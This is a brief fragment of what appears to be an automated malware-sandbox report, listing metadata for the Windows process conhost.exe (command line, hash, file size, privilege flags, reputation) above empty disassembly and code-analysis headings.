            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff7ecfc0000
            File size:625664 bytes
            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            Disassembly

            Code Analysis

            Reset < >